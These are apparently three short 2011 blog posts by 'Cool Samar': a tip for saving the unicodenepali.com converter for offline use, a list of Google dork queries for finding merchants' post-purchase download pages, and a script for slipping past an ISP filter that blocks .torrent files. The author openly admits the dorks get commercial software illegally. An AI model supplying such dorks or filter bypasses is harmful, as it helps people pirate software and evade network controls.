Sometimes we might need to use the unicodenepali.com converter without having access to the internet. By just saving the complete webpage of the converter, you get an offline version of it. You can then take the downloaded HTML file and its related files anywhere and open the HTML file to run the converter offline.
Even better, if you are a Windows user, you could save the .hta version from Internet Explorer and make a single file of the converter on your own computer.
Go to the URL: http://www.unicodenepali.com/v3/convert.html
and press Ctrl+S to save the complete webpage. See the screenshot below:
Hope you find this useful.
2011-03-21T23:38:00+05:45
Cool Samar
Labels:
tricks and tips,
unicode,
web
Saturday, 26 February 2011
How to get things for free in internet [Google dorks]
Well, it's been a few days since I posted. Today I have come with an interesting post that will help you get things for free on the internet. Of course, it is not legal, but it works in many cases, though not always. And many of the results might be crap.
The following is a list of Google dorks that will help you get some commercial software for free. Google dorks are keyword phrases that can be searched with the Google search engine.
intitle:"Thank You For Your Order" intext:Click Here to Download
intitle:"Thank You For Your Purchase" intext:Click Here to Download
inurl:/thankyou*.html intitle:Thank you for your order! intext:Click Here to Download
intitle:"Thank You For Your Order!" intext:download
inurl:thanks intext:"Thank You For Your Order!" "Click Here" filetype:html
The above dorks are just examples. You can modify them and do some experiments on your own to search for specific domains, etc. I hope this is useful. Thanks :)
2011-02-26T20:15:00+05:45
Cool Samar
Labels:
google hacking,
hacking,
internet,
software,
web
Friday, 18 February 2011
Torrent 2 Text for bypassing .torrent filter by ISPs
I have just completed this pretty simple script to let you download torrent files as text files. I wrote it because ISA server was actually blocking me from downloading the .torrent files, so I quickly wrote this and now I am putting it online.
To use this little script, all you have to do is copy the link location of the .torrent file and paste it in the textbox.
Torrent to text tool
Have fun :)
2011-02-18T21:57:00+05:45
Cool Samar
Labels:
security bypass,
torrent,
useful website,
web